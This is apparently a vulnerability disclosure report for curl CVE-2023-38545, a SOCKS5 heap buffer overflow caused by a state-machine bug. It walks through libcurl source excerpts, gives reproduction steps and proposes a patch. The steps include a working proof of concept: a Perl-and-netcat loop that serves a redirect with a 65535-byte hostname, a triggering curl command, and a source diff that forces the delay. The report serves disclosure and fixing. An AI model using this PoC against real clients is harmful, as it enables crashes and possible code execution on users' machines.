Sep 30, 2023 - 8:26 a.m.

curl: CVE-2023-38545: socks5 heap buffer overflow

The SOCKS5 state machine can be manipulated by a remote attacker to overflow heap memory if four conditions are met:

  1. The request is made via socks5h.
  2. The state machine’s negotiation buffer is smaller than ~65k.
  3. The SOCKS server’s “hello” reply is delayed.
  4. The attacker sets a final destination hostname larger than the negotiation buffer.

libcurl is supposed to disable SOCKS5 remote hostname resolution for hostnames longer than 255 bytes, but fails to do so because of a state machine bug.

For example, a Tor user runs a libcurl app with follow-location enabled and connects to a rogue onion server, which replies with a payload in the Location: header that causes a crash or worse.


do_SOCKS initializes local variable socks5_resolve_local depending on the CURLPROXY_ name. There are two relevant names for this state machine:

  • CURLPROXY_SOCKS5 (SOCKS5 with local resolve of dest host)
  • CURLPROXY_SOCKS5_HOSTNAME (SOCKS5 with remote resolve of dest host)


  bool socks5_resolve_local =
    (conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;

For this scenario, CURLPROXY_SOCKS5_HOSTNAME is the name and socks5_resolve_local is initialized FALSE.

The do_SOCKS state machine is entered for the first time for the connection. sx->state is CONNECT_SOCKS_INIT (which happens to be the first label). In that state the hostname length is checked and if too long to resolve remotely (>255) then it sets socks5_resolve_local to TRUE.


    /* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
    if(!socks5_resolve_local && hostname_len > 255) {
      infof(data, "SOCKS5: server resolving disabled for hostnames of "
            "length > 255 [actual len=%zu]", hostname_len);
      socks5_resolve_local = TRUE;
    }

The local variable socks5_resolve_local is changed, but it is re-initialized on every call to do_SOCKS. Because this is a state machine, subsequent calls resume in a different state and do not make the same change. This is the bug.

For this scenario, the hostname is longer than 255 characters and do_SOCKS is on a subsequent call, which means socks5_resolve_local remains FALSE. This can happen by chance or be forced by an attacker.
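The lost-local-variable pattern can be modelled in a few lines. This is a minimal sketch, not libcurl code: the toy_ names, the three states, and the reply_ready flag are all hypothetical stand-ins for do_SOCKS, sx->state, and the delayed server hello.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical three-state model of the negotiation (not libcurl's states) */
enum toy_state { TOY_INIT, TOY_READ, TOY_DONE };

struct toy_conn {
  enum toy_state state;   /* persists across calls, like sx->state */
  bool reply_ready;       /* has the server "hello" arrived yet? */
  bool resolved_locally;  /* decision in effect when negotiation completed */
};

/* Returns true once negotiation has finished, false if it must be re-entered */
static bool toy_do_socks(struct toy_conn *c, size_t hostname_len)
{
  bool resolve_local = false; /* socks5h; re-initialized on EVERY call */

  switch(c->state) {
  case TOY_INIT:
    if(!resolve_local && hostname_len > 255)
      resolve_local = true; /* the length check only runs in this state */
    c->state = TOY_READ;
    /* FALLTHROUGH */
  case TOY_READ:
    if(!c->reply_ready)
      return false; /* leave the function; resolve_local is discarded */
    c->resolved_locally = resolve_local;
    c->state = TOY_DONE;
    return true;
  case TOY_DONE:
    break;
  }
  return true;
}

/* Drives the model; 'delayed' means the reply arrives only on the second call */
static bool toy_negotiate(size_t hostname_len, bool delayed)
{
  struct toy_conn c = { TOY_INIT, !delayed, false };
  if(!toy_do_socks(&c, hostname_len)) {
    c.reply_ready = true;
    (void)toy_do_socks(&c, hostname_len);
  }
  return c.resolved_locally;
}
```

In this model toy_negotiate(300, false) ends with local resolution, while toy_negotiate(300, true) ends with remote resolution of a 300-byte hostname, which is the case the length check was meant to rule out.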

The client “hello” SOCKS packet contains available methods and is sent to the server. State CONNECT_SOCKS_READ_INIT => CONNECT_SOCKS_READ is entered to parse the server “hello” packet (method selection reply). The server has not yet replied so do_SOCKS returns CURLPX_OK.


    sx->outstanding = 2; /* expect two bytes */
    sx->outp = socksreq; /* store it here */
    presult = socks_state_recv(cf, sx, data, CURLPX_RECV_CONNECT,
                               "initial SOCKS5 response");
    if(CURLPX_OK != presult)
      return presult;
    else if(sx->outstanding) {
      /* remain in reading state */
      return CURLPX_OK;
    }
    else if(socksreq[0] != 5) {
      failf(data, "Received invalid version in initial SOCKS5 response.");
      return CURLPX_BAD_VERSION;
    }
    else if(socksreq[1] == 0) {
      /* DONE! No authentication needed. Send request. */
      sxstate(sx, data, CONNECT_REQ_INIT);
      goto CONNECT_REQ_INIT;
    }

On a subsequent call do_SOCKS is in the same state where it’s waiting for the initial server reply. If the reply is valid, and in this scenario it is, then the state machine will goto CONNECT_REQ_INIT which will goto CONNECT_RESOLVE_REMOTE since socks5_resolve_local is FALSE.


    if(socks5_resolve_local) {
      enum resolve_t rc = Curl_resolv(data, sx->hostname, sx->remote_port,
                                      TRUE, &dns);

      if(rc == CURLRESOLV_ERROR)
        return CURLPX_RESOLVE_HOST;

      if(rc == CURLRESOLV_PENDING) {
        sxstate(sx, data, CONNECT_RESOLVING);
        return CURLPX_OK;
      }
      sxstate(sx, data, CONNECT_RESOLVED);

In CONNECT_RESOLVE_REMOTE the hostname is copied into the socksreq buffer. The code assumes the hostname is <= 255 characters, which, as discussed above, is not guaranteed.


      else {
        socksreq[len++] = 3;
        socksreq[len++] = (char) hostname_len; /* one byte address length */
        memcpy(&socksreq[len], sx->hostname, hostname_len); /* w/o NULL */
        len += hostname_len;
      }
      infof(data, "SOCKS5 connect to %s:%d (remotely resolved)",
            sx->hostname, sx->remote_port);

socksreq points to the temporary download buffer (i.e. data->state.buffer), which was repurposed to send/receive the SOCKS negotiation since the transfer is not yet downloading.

If the size of the hostname exceeds the remaining size of the buffer then there is a buffer overflow. If the size of the hostname maxes out but does not exceed the remaining size then there is an overflow when the buffer is next written to.
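A side effect worth spelling out is that the one-byte length field and the number of bytes copied disagree once the hostname exceeds 255. The sketch below is illustrative only; toy_domain_field and toy_encode_len are hypothetical names, and it casts to unsigned char (rather than the char used in the excerpt) so the result is well defined.

```c
#include <stddef.h>

/* Hypothetical record of what ends up in the request for a given hostname */
struct toy_domain_field {
  unsigned char declared_len; /* the single length byte put on the wire */
  size_t copied_len;          /* the number of bytes memcpy would copy */
};

static struct toy_domain_field toy_encode_len(size_t hostname_len)
{
  struct toy_domain_field f;
  /* narrowing to one byte keeps only the low 8 bits of the length */
  f.declared_len = (unsigned char)hostname_len;
  /* the copy still uses the full, untruncated length */
  f.copied_len = hostname_len;
  return f;
}
```

For a 300-byte hostname the declared length is 44 while 300 bytes are copied; for 65535 bytes the declared length is 255.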

Regardless, at this point we know from earlier checks that the hostname length is at most 65535 (MAX_URL_LEN) and that the full size of the buffer is at least data->set.buffer_size + 1.


  else if(strlen(data->state.up.hostname) > MAX_URL_LEN) {
    failf(data, "Too long host name (maximum is %d)", MAX_URL_LEN);


CURLcode Curl_preconnect(struct Curl_easy *data)
{
  if(!data->state.buffer) {
    data->state.buffer = malloc(data->set.buffer_size + 1);

data->set.buffer_size varies. Before the allocation above, libcurl sets data->set.buffer_size to a default of 16384 (see READBUFFER_SIZE, aka CURL_MAX_WRITE_SIZE), which the user may have overridden via CURLOPT_BUFFERSIZE. A significant example is the curl tool, which uses CURLOPT_BUFFERSIZE to set the size to its own default of 102400, or to the user's --limit-rate setting if that value is smaller than 100k.

The two buffer size configurations that are likely widely used are 16384+1 for libcurl apps without CURLOPT_BUFFERSIZE and 102400+1 for curl tool commands without a low --limit-rate. For the former the buffer can be overflowed and for the latter it can’t: 16384+1 < 65535 < 102400+1.
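The comparison can be worked through numerically. This is a rough sketch under stated assumptions: the toy_ helpers are hypothetical, the request is assumed to carry 5 bytes before the hostname (version, command, reserved, address type, length byte) and a 2-byte port after it, and any clamping libcurl applies to CURLOPT_BUFFERSIZE is ignored.

```c
#include <stddef.h>

#define TOY_LIB_DEFAULT  16384   /* libcurl default buffer size per the text */
#define TOY_TOOL_DEFAULT 102400  /* curl tool default per the text */

/* Buffer size the curl tool would request; limit_rate == 0 means "not set" */
static size_t toy_tool_buffer_size(size_t limit_rate)
{
  if(limit_rate && limit_rate < TOY_TOOL_DEFAULT)
    return limit_rate;
  return TOY_TOOL_DEFAULT;
}

/* Bytes written past the end of a (buffer_size + 1) allocation, 0 if none */
static size_t toy_overflow_by(size_t buffer_size, size_t hostname_len)
{
  size_t alloc = buffer_size + 1;
  size_t need = 5 + hostname_len + 2; /* assumed prefix + hostname + port */
  return need > alloc ? need - alloc : 0;
}
```

Under these assumptions a 65535-byte hostname runs 49157 bytes past a 16384+1 buffer and fits inside a 102400+1 buffer. toy_tool_buffer_size(16384) models the --limit-rate 16384 case, which brings the curl tool down to the smaller size.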

The characters allowed in the hostname depend on whether libcurl was built with IDN support. If it was, then as long as the hostname contains only characters < 0x80, no IDN conversion is attempted. Higher-value characters seem very unlikely to pass through, but that would depend on the IDN library. Without IDN support the characters pass through. For example, Location: http://\xff\r\n will pass through without IDN.


bool Curl_is_ASCII_name(const char *hostname)
{
  /* get an UNSIGNED local version of the pointer */
  const unsigned char *ch = (const unsigned char *)hostname;

  if(!hostname) /* bad input, consider it ASCII! */
    return TRUE;

  while(*ch) {
    if(*ch++ & 0x80)
      return FALSE;
  }
  return TRUE;
}


#ifdef USE_IDN
  /* Check name for non-ASCII and convert hostname if we can */
  if(!Curl_is_ASCII_name(host->name)) {
    char *decoded;
    CURLcode result = idn_decode(host->name, &decoded);

Steps To Reproduce:

The attacker needs to control the hostname. For example, the user has set CURLOPT_FOLLOWLOCATION (--location for the curl tool) so that libcurl will follow redirects. The attacker would need control of the hostname in the location header.

The attacker needs the state machine to be delayed, as discussed earlier. For example, the attacker controls the SOCKS server and delays the initial server hello.

The attacker probably needs to know how large data->set.buffer_size is and how the memory is typically allocated, such as what comes after data->state.buffer in the heap. For example, the attacker has a copy of the program that is using libcurl and can debug it in a similar environment.

Supporting Material/References:

Unhandled exception at 0x6e1557be (libcurld.dll) in curld.exe: 0xC0000005: Access violation reading location 0x41414141.

Refer to attached screenshot Capture.PNG.

HEAP[curld.exe]: Heap block at 005F8200 modified at 005FC22D past requested size of 4025

Note that 4025 is in hex; in decimal it is 16421, which is 16384+1 plus heap guard bytes.
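The conversion can be checked with a couple of lines of arithmetic. The helper name toy_heap_overhead is hypothetical and only subtracts the libcurl allocation (buffer_size + 1) from the requested size reported by the heap checker.

```c
/* Extra bytes in the reported block beyond libcurl's (buffer_size + 1) */
static unsigned long toy_heap_overhead(unsigned long requested,
                                       unsigned long buffer_size)
{
  return requested - (buffer_size + 1);
}
```

With requested = 0x4025 (16421 decimal) and buffer_size = 16384, the difference is 36 bytes, which the report attributes to heap guard bytes.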

while true; do { perl -e 'print ("HTTP/1.1 301 Moved\r\nContent-Length: 0\r\nConnection: Close\r\nLocation: http://");print("A"x65535);print("\r\n\r\n")'; sleep 2; } | nc -4l [yourip] 8000; done

Start a socks5 server on remoteip (for the latency) and run curl repeatedly until it reads from 0x41414141 (AAAAA…):

curl -v --limit-rate 16384 --location --proxy socks5h://[remoteip]:1080 http://[yourip]:8000

If making the socks server remote doesn't produce enough latency, you'd have to modify its source or force the delay via the libcurl source:

+    {
+      static int x = 0; /* int, since a C99 bool saturates at 1 when incremented */
+      if(++x == 2)
+        return CURLPX_OK;
+    }
     presult = socks_state_recv(cf, sx, data, CURLPX_RECV_CONNECT,
                                "initial SOCKS5 response");


Refer to attached patch curl_security_fix.patch. It fixes the issue by changing the remote resolve check to return error CURLPX_LONG_HOSTNAME if dest host is larger than 255.
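The idea of refusing instead of copying can be sketched as follows. This is not the attached patch and not libcurl code: toy_build_connect is a hypothetical helper, the field layout follows the SOCKS5 request format in RFC 1928, and returning 0 stands in for an error such as CURLPX_LONG_HOSTNAME.

```c
#include <stddef.h>
#include <string.h>

/* Builds a SOCKS5 CONNECT request with a domain-name address.
   Returns the number of bytes written, or 0 if the hostname is longer
   than 255 bytes or the request would not fit in buf. */
static size_t toy_build_connect(unsigned char *buf, size_t buflen,
                                const char *hostname, unsigned short port)
{
  size_t hlen = strlen(hostname);
  size_t need = 4 + 1 + hlen + 2; /* header, length byte, name, port */
  size_t len = 0;

  if(hlen > 255 || need > buflen)
    return 0; /* refuse rather than truncate the length or overflow */

  buf[len++] = 5; /* VER: SOCKS version 5 */
  buf[len++] = 1; /* CMD: connect */
  buf[len++] = 0; /* RSV: must be zero */
  buf[len++] = 3; /* ATYP: domain name */
  buf[len++] = (unsigned char)hlen; /* safe: hlen <= 255 was checked */
  memcpy(&buf[len], hostname, hlen); /* no terminating zero is sent */
  len += hlen;
  buf[len++] = (unsigned char)(port >> 8);   /* port, network byte order */
  buf[len++] = (unsigned char)(port & 0xff);
  return len;
}
```

Checking both the protocol limit and the buffer size before the first write means no state-dependent flag has to survive between calls for the copy to stay in bounds.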



If the state machine is not delayed and works as intended, then the resolution is made locally, which is in my opinion a privacy violation because a local DNS query could deanonymize a user who specifically requests socks5h. My patch does not allow it.

If the state machine is delayed then the resolution is made remotely with a malformed SOCKS packet. The attacker has written to the heap and likely overwritten in-use data that comes after data->state.buffer. It's undefined behavior at best and possible RCE at worst.

I think if libcurl was built with IDN support then the worst case is much harder to achieve because only certain bytes can be in the hostname.